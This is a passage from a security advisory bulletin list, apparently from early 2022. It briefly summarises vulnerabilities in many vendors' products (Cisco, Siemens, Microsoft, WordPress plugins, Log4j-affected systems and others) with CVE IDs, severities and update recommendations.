15.2.1 and iPadOS 15.2.1. An attacker can exploit this vulnerability to take control of an
affected device.
CVE ID: CVE-2022-22588
Multiple vulnerabilities have been discovered in Mitsubishi Electric's Equipment- MELSEC-F
Series, and MELSEC iQ-R, Q and L Series. An attacker can exploit these vulnerabilities to
take control of an affected system.
CVE ID: CVE-2021-20613 (High), CVE-2021-20612 (High), CVE-2020-5652 (High)
F5 Networks has released security updates to address multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take control of an affected
device.
CVE ID: CVE-2018-3620 (Medium), CVE-2020-14550 (Medium), CVE-2020-2574 (Medium),
CVE-2020-2752 (Medium), CVE-2020-2922 (Low), CVE-2021-2007 (Low), CVE-2021-2011 (Medium)
QNAP NAS has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-38682, CVE-2021-38689, CVE-2021-38690, CVE-2021-38691,
CVE-2021-38692, CVE-2021-38677, CVE-2021-38678
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-43818, CVE-2021-45085, CVE-2021-45086, CVE-2021-45087,
CVE-2021-45088
It has been discovered that Jimoty App for Android uses a hard-coded API key for an external
service. Jimoty for Android versions prior to 3.7.42 are affected.
CVE ID: CVE-2022-0131 (Medium)
Multiple vulnerabilities such as Cross-site request forgery, Reflected cross-site scripting,
and Stored cross-site scripting have been discovered in WordPress Plugin "Quiz And Survey
Master". The affected versions are Quiz And Survey Master versions prior to 7.3.7.
CVE ID: CVE-2022-0180 (Medium), CVE-2022-0181 (Medium), CVE-2022-0182 (Medium)
Juniper Networks has released security updates to resolve multiple vulnerabilities in
Juniper Networks Junos OS. An attacker can exploit these vulnerabilities to take control of
an affected system.
SUSE has released security updates to resolve several vulnerabilities in multiple products.
CVE ID: CVE-2021-44224, CVE-2021-44790, CVE-2021-3572, CVE-2021-45942, CVE-2021-4126,
CVE-2021-44538
It has been discovered that lxml, a Python binding for the libxml2 and libxslt libraries,
does not properly sanitize its input, which can lead to cross-site scripting. It is
recommended to upgrade the lxml packages.
CVE ID: CVE-2021-43818
Multiple vulnerabilities have been discovered in various Palo Alto Networks products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-0015 (High), CVE-2022-0014 (Medium), CVE-2022-0013 (Medium),
CVE-2022-0012 (Medium)
Google has released Chrome Beta 98 (98.0.4758.54) for Android, Chrome Beta 98 (98.0.4758.51)
for iOS, and Chrome version 98.0.4758.55 for Mac and 98.0.4758.54 for Windows and Linux.
This versions addresses vulnerabilities that an attacker can exploit to take control of an
affected system.
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20658 (Critical), CVE-2022-20652 (Medium), CVE-2022-20663 (Medium),
CVE-2022-20626 (Medium), CVE-2022-20656 (Medium), CVE-2022-20657 (Medium), CVE-2022-20660
(Medium), CVE-2022-20631 (Medium), CVE-2022-20632 (Medium), CVE-2022-20635 (Medium),
CVE-2022-20636 (Medium), CVE-2022-20651 (Medium)
A Remote Code Execution (RCE) vulnerability has been discovered in in KCodes NetUSB
component, integrated into millions of end-user router devices such as Netgear, TP-Link,
Tenda, EDiMAX, D-Link, and Western Digital.
CVE ID: CVE-2021-45608
Multiple vulnerabilities have been resolved in GitLab updated versions 14.6.2, 14.5.3, and
14.4.5 for GitLab Community Edition (CE) and Enterprise Edition (EE).
Node.js has released security updates to resolve multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-44531 (Medium), CVE-2021-44532 (Medium), CVE-2021-44533 (Medium),
CVE-2022-21824(Low)
An Elevation of Privilege vulnerability has been discovered in Microsoft Windows Active
Directory Domain Services Successful exploitation of this vulnerability may allow a remote
attacker to gain elevated privileges on the targeted system.
CVE ID: CVE-2022-21857
Multiple vulnerabilities such as Use of Hard-coded Credentials, and Buffer Copy without
Checking Size of Input have been discovered in Schneider Electric's Equipment- Easergy P5.
An attacker can exploit these vulnerabilities to cause disclosure of the device credentials,
denial of service, device reboot, or at attacker gaining full control of the relay.
CVE ID: CVE-2022-22722 (High), CVE-2022-22723 (High)
Multiple vulnerabilities have been discovered in several products of Siemens. A remote
attacker may exploit some of these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-45033 (Critical), CVE-2021-45034 (Medium), CVE-2021-45460 (Low),
CVE-2021-41769 (Medium), CVE-2021-31346 (High), CVE-2021-31885 (High), CVE-2021-31889
(High), CVE-2021-31890 (High), CVE-2021-31345 (High), CVE-2021-31344 (Medium)
Microsoft has released updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-21969 (Critical), CVE-2022-21907 (Critical), CVE-2022-21901
(Critical), CVE-2022-21855 (Critical), CVE-2022-21849 (Critical)
Citrix has released a security update to address a Local privilege Escalation vulnerability
in Workspace App for Linux. An attacker can exploit this vulnerability to take control of an
affected system.
CVE ID: CVE-2022-21825
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An improper handling of syntactically invalid structure vulnerability has been discovered in
Johnson Controls' Equipment- VideoEdge. Running a vulnerability scanner against VideoEdge
NVRs can cause some functions to stop.
CVE ID: CVE-2021-36199 (Medium)
Multiple vulnerabilities have been discovered in Wordpress, a web blogging tool. These
vulnerabilities allow remote attackers to perform SQL injection, run unchecked SQL queries,
bypass hardening, or perform Cross-Site Scripting (XSS) attacks. It is recommended to
upgrade the wordpress packages.
CVE ID: CVE-2022-21661, CVE-2022-21662, CVE-2022-21663, CVE-2022-21664
Ubuntu has released security updates to address multiple vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected device.
Multiple vulnerabilities have been discovered in Schneider Electric's Modicon M340
controller and Communication Modules. It is recommended to apply the mitigations immediately
to reduce the risk of exploit.
CVE ID: CVE-2022-22724 (High), CVE-2020-7534 (Medium)
It has been discovered that all versions of Samba prior to 4.13.16 are vulnerable to a
malicious client using an SMB1 or NFS symlink race to allow a directory to be created in an
area of the server file system not exported under the share definition.
CVE ID: CVE-2021-43566
RedHat has released security updates to address multiple vulnerabilities in Red Hat
OpenShift Container Platform. An attacker can exploit these vulnerabilities to take control
of an affected device.
Cisco has released security updates to address Apache Log4j vulnerabilities in multiple
Cisco products.
CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical)
Huawei has released security updates to address multiple vulnerabilities in OpenSSL
affecting several Huawei products. An attacker can exploit these vulnerabilities to take
control of an affected device.
CVE ID: CVE-2016-2108, CVE-2016-2107, CVE-2016-2106, CVE-2016-2105, CVE-2016-2109,
CVE-2016-2176, CVE-2016-0800
Google has released Beta channel update 98.0.4758.46 (Platform version: 14388.24.0) for most
Chrome OS devices, and Chrome Beta channel update 98.0.4758.48 for Windows, Mac and Linux.
It has been discovered that vulnerabilities in Samba versions affect multiple NetApp
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2021-43566 (Low), CVE-2021-20316 (Medium)
It has been discovered that ClamAV version 0.102, an anti-virus toolkit, has reached its
end-of-life. ClamAV has been updated to version 0.103 to be able to receive virus signature
updates. It is recommended to upgrade the clamav packages.
Multiple vulnerabilities have been discovered in vim, an enhanced vi text editor. It is
recommended to upgrade the vim packages.
CVE ID: CVE-2017-17087, CVE-2019-20807, CVE-2021-3778, CVE-2021-3796
It has been discovered that Teedy, versions v1.5 through v1.9 are vulnerable to Stored
Cross-Site Scripting (XSS) in the name of a created Tag. Since the Tag name is not being
sanitized properly in the edit tag page, a low privileged attacker can store malicious
scripts in the name of the Tag.
CVE ID: CVE-2022-22115 (Critical)
It has been discovered that Teedy, versions v1.5 through v1.9 are vulnerable to Reflected
Cross-Site Scripting (XSS). The "search term" search functionality is not sufficiently
sanitized while displaying the results of the search, which can be leveraged to inject
arbitrary scripts.
CVE ID: CVE-2022-22114 (Critical)
It has been discovered that various Silicon Labs Z-Wave chipsets do not support encryption,
can be downgraded to not use weaker encryption, and are vulnerable to denial of service.
Depending on the chipset and device, an attacker within Z-Wave radio range can deny service,
cause devices to crash, deplete batteries, intercept, observe, and replay traffic, and
control vulnerable devices.
CVE ID: CVE-2020-9057, CVE-2020-9058, CVE-2020-9059, CVE-2020-9060, CVE-2020-9061,
CVE-2020-10137
Debian has released security update to address multiple vulnerabilities in Ghostscript, the
GPL PostScript/PDF interpreter.
CVE ID: CVE-2021-45944 (Medium), CVE-2021-45949 (Medium)
Debian has released security update to address a vulnerability in roundcube, a skinnable
AJAX based webmail solution for IMAP servers which may allow an attacker to perform
Cross-Site Scripting (XSS) attacks.
CVE ID: CVE-2021-46144
Red Hat has released security update for rh-nodejs14-nodejs and rh-nodejs14-nodejs-nodemon
to resolve multiple vulnerabilities.
CVE ID: CVE-2021-3807 (High), CVE-2021-3918 (Critical), CVE-2021-22959 (Medium),
CVE-2021-22960 (Medium), CVE-2021-37701(High), CVE-2021-37712 (High)
QNAP has released security update to resolve a vulnerability in NAS running QVPN Service
which allows an attacker to run arbitrary code in the system. The affected products are QVPN
Service 3.0.760 and later.
A reflected Cross-Site Scripting (XSS) vulnerability has been resolved in QTS, QuTS hero and
QuTScloud TFTP server which allows remote attacker to inject malicious code.
CVE ID: CVE-2021-38674 (Medium)
A stack-based buffer overflow vulnerability has been discovered in the SonicOS SessionID
HTTP response header. This vulnerability affects SonicOS Gen 6 and Gen 7 firmware versions.
CVE ID: CVE-2021-20048 (Medium)
A vulnerability has been discovered in the H2 database console. This vulnerability has the
same root cause as the infamous Log4Shell vulnerability in Apache Log4j (JNDI remote class
loading).
CVE ID: CVE-2021-42392 (Critical)
It has been discovered that kubectl does not neutralize escape, meta or control sequences
contained in the raw data it outputs to a terminal. This includes but is not limited to the
unstructured string fields in objects such as Events.
CVE ID: CVE-2021-25743 (Low)
Multiple vulnerabilities have been discovered in IDEC's Equipment- PLCs (Programmable Logic
Controllers). Successful exploitation of these vulnerabilities can allow an attacker to
upload, alter, and/or download the PLC user program.
CVE ID: CVE-2021-37400 (High), CVE-2021-37401 (High), CVE-2021-20826 (High),
CVE-2021-20827 (High)
An uncontrolled resource consumption vulnerability has been discovered in Fernhill
Software's Equipment- Fernhill SCADA Server. Successful exploitation of this vulnerability
can cause a Denial-of-Service(DoS) condition. The affected products are Fernhill SCADA
Server Version 3.77 and earlier on all supported platforms (Windows, Linux, macOS).
CVE ID: CVE-2022-21155 (High)
A stack-based buffer overflow vulnerability has been discovered in Omron's Equipment-
CX-One. Successful exploitation of this vulnerability can allow arbitrary code execution.
The affected products are CX-One: Versions 4.60 and prior.
CVE ID: CVE-2022-21137 (High)
An improper access control vulnerability has been discovered in Philips' Equipment- Engage
Software. Successful exploitation of this vulnerability can allow improper viewing of
business contact information. The affected products are Engage Software Versions 6.2.1 and
prior.
CVE ID: CVE-2021-23173 (Low)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Debian has released security update to address a vulnerability in Sphinxsearch- a fast
standalone full-text SQL search engine which can allow arbitrary files to be read by abusing
a configuration option.
CVE ID: CVE-2020-29050
A SQL injection vulnerability has been discovered in the web-based management interface of
Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM). It is
recommended to update the software.
CVE ID: CVE-2020-3339 (Medium)
A vulnerability has been discovered in the web-based management interface of Cisco Common
Services Platform Collector (CSPC) which can allow an authenticated, remote attacker to
access sensitive data on an affected system. It is recommended to update the software.
CVE ID: CVE-2021-34774 (Medium)
Microsoft has released the latest Microsoft Edge Stable Channel (Version 97.0.1072.55) which
incorporates the latest security updates of the Chromium project to resolve multiple
vulnerabilities.
Google has released update for Chrome Beta 98 (98.0.4758.34) for both Android & iOS and
stable channel 97.0.4692.77 (Platform version: 14324.62.0) for most Chrome OS devices.
It has been discovered that forge is vulnerable to URL Redirection to Untrusted Site. An
attacker can exploit this vulnerability to take control of an affected system.
CVE ID: CVE-2022-0122 (Medium)
Multiple vulnerabilities have been discovered in Moxa's EDR-G903, EDR-G902 and EDR-810
Series Secure Routers . Moxa has developed appropriate solutions to address these
vulnerabilities.
Multiple DNSpooq vulnerabilities have been discovered in dnsmasq which affects Moxa's
AWK-3131A/4131A/1137C/1131A series products. Moxa has developed appropriate solutions to
address these vulnerabilities.
CVE ID: CVE-2020-25681, CVE-2020-25682, CVE-2020-25683, CVE-2020-25684,
CVE-2020-25685, CVE-2020-25686, CVE-2020-25687
Dell has released security updates to address multiple vulnerabilities in several products
which can be exploited by malicious users to compromise the affected system.
It has been discovered that WordPress Plugin "Advanced Custom Fields" contains multiple
missing authorisation vulnerabilities. An attacker can exploit these vulnerabilities to take
control of an affected system.
CVE ID: CVE-2021-20865 (Medium), CVE-2021-20866 (Medium), CVE-2021-20867 (Medium)
It has been discovered that in libexpat aka Expat, a crafted XML file can cause integer
overflow on m_groupSize in function doProlog.
CVE ID: CVE-2021-46143
A vulnerability has been discovered in AtaLegacySmm in the kernel 5.0 before 05.08.46, 5.1
before 05.16.46, 5.2 before 05.26.46, 5.3 before 05.35.46, 5.4 before 05.43.46, and 5.5
before 05.51.45 in Insyde InsydeH2O. Code execution vulnerability can occur because the SMI
handler lacks a CommBuffer check.
CVE ID: CVE-2021-41842
A null pointer dereference vulnerability has been discovered in GPAC 1.0.1 in MP4Box via
__strlen_avx2, which causes a Denial of Service (DoS).
CVE ID: CVE-2021-45831
Multiple vulnerabilities have been discovered in Daybyday CRM. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-22111 (High), CVE-2022-22110 (High), CVE-2022-22109 (Medium),
CVE-2022-22108 (Medium), CVE-2022-22107 (Medium)
ReHat has released Red Hat OpenShift Container 4.8.25 to resolve multiple vulnerabilities
and add enhancements.
CVE ID: CVE-2021-39240 (High), CVE-2021-39241 (Medium), CVE-2021-39242 (High),
CVE-2021-39246 (Medium)
Red Hat has released security update for Red Hat Single Sign-On 7.5 container images for IBM
P/Z which fixes incorrect authorization allowing unprivileged users to create other users.
CVE ID: CVE-2021-3712 (High), CVE-2021-4133, CVE-2021-42574 (High)
Ubuntu has released security updates to address several vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
Siemens has released a list of products affected from Apache Log4j vulnerabilities. The
workarounds & mitigations are also available.
CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical)
It has been discovered that WordPress Plugin "Advanced Custom Fields" contains multiple
missing authorisation vulnerabilities. An attacker can exploit these vulnerabilities to take
control of an affected system.
CVE ID: CVE-2021-20865 (Medium), CVE-2021-20866 (Medium), CVE-2021-20867 (Medium)
Intel has released security update to patch Apache Log4j vulnerabilities in multiple Intel
Products.
CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical)
NETGEAR has released security updates to address multiple vulnerabilities in wireless access
points. A remote attacker can exploit these vulnerabilities to take control of an affected
system.
The Android Security Bulletin contains details of security vulnerabilities affecting Android
devices. Security patch levels of 05 Jan 2022 or later address all of these issues.
Debian has released security update for Apache HTTP server to resolve several
vulnerabilities. A malicious actor can take advantage of these vulnerabilities to cause
Denial of Service (DoS) or Server Side Request forgery (SSRF) attack.
CVE ID: CVE-2021-44224 (High), CVE-2021-44790 (Critical)
Django has released security update to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-45452, CVE-2021-45116, CVE-2021-45115
A XSS vulnerability has been discovered in Latte, an open source template engine for PHP.
This vulnerability has been resolved in the versions 2.8.8, 2.9.6 and 2.10.8.
CVE ID: CVE-2022-21648 (High)
A SQL injection vulnerability has been discovered in CodeIgniter. This vulnerability has
been resolved in the versions 4.1.6 or later.
CVE ID: CVE-2022-21647 (High)
Multiple vulnerabilities have been discovered in Thunderbird, which can result in the
execution of arbitrary code, spoofing, information disclosure, downgrade attacks on SMTP
STARTTLS connections or misleading display of OpenPGP/MIME signatures. It is recommended to
upgrade thunderbird packages.
A heap-overflow vulnerability has been discovered in several VMware products. The affected
products are VMware ESXi, VMware Workstation, VMware Fusion and VMware Cloud Foundation.
CVE ID: CVE-2021-22045 (High)
Multiple vulnerabilities have been discovered in multiple IBM products. An attacker can
exploit some of these vulnerabilities to take control of an affected system.
A vulnerability has been discovered in linux kernel versions prior to 4.17 that affects
multiple NetApp Products. Successful exploitation of this vulnerability can lead to
disclosure of sensitive information, addition or modification of data, or Denial of Service
(DoS).
CVE ID: CVE-2018-25020 (High)
A vulnerability has been discovered in OpenSSL version 3.0.0 that affects multiple NetApp
Products. Successful exploitation of this vulnerability can lead to Denial of Service (DoS).
CVE ID: CVE-2021-4044 (Medium)
Microsoft has released an emergency out-of-band update for several window severs to
address issue that might prevent user from using Remote Desktop to reach the server and also
slows performance.
Debian has released security update for Salt Regression that addresses multiple
vulnerabilities.
CVE ID: CVE-2020-16846 (Critical), CVE-2021-3197 (Critical), CVE-2020-28243 (High) ,
CVE-2021-25282 (Critical), CVE-2021-25284 (Medium)
An information exposure vulnerability has been discovered in Opmantek Open-AudIT 4.2.0 which
allows an authenticated attacker to read file outside of the restricted directory.
CVE ID: CVE-2021-44674
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in Shockwall system
that results in arbitrary code execution for controlling the system or disrupting service.
CVE ID: CVE-2021-45917
It has been discovered that ASUS RT-AX56U Wi-Fi Router is vulnerable to stack-based buffer
overflow vulnerability due to improper validation for httpd parameter length. An
authenticated local area network attacker can launch arbitrary code execution to control the
system or disrupt service.
CVE ID: CVE-2021-44158
MediaTek has released security update to address multiple vulnerabilities affecting MediaTek
Smartphone, Tablet, AIoT, Smart display, Wi-Fi and TV chipsets.
It has been discovered that ENC DataVault 7.1.1W uses an inappropriate encryption algorithm
such that an attacker even though does not know the secret key can make ciphertext
modifications that are reflected in modified plaintext.
CVE ID: CVE-2021-36751
It has been discovered that Expat version before 2.4.3- a stream-oriented XML 1.0 parser
library contains a realloc misbehavior vulnerability.
CVE ID: CVE-2021-45960
It has been discovered that Microsoft Exchange Server 2016 and Exchange Server
2019 have problem related to a date check failure with the change of the new year 2022 which
causes the malware engine to crash or resulting in messages being stuck in transport queues.
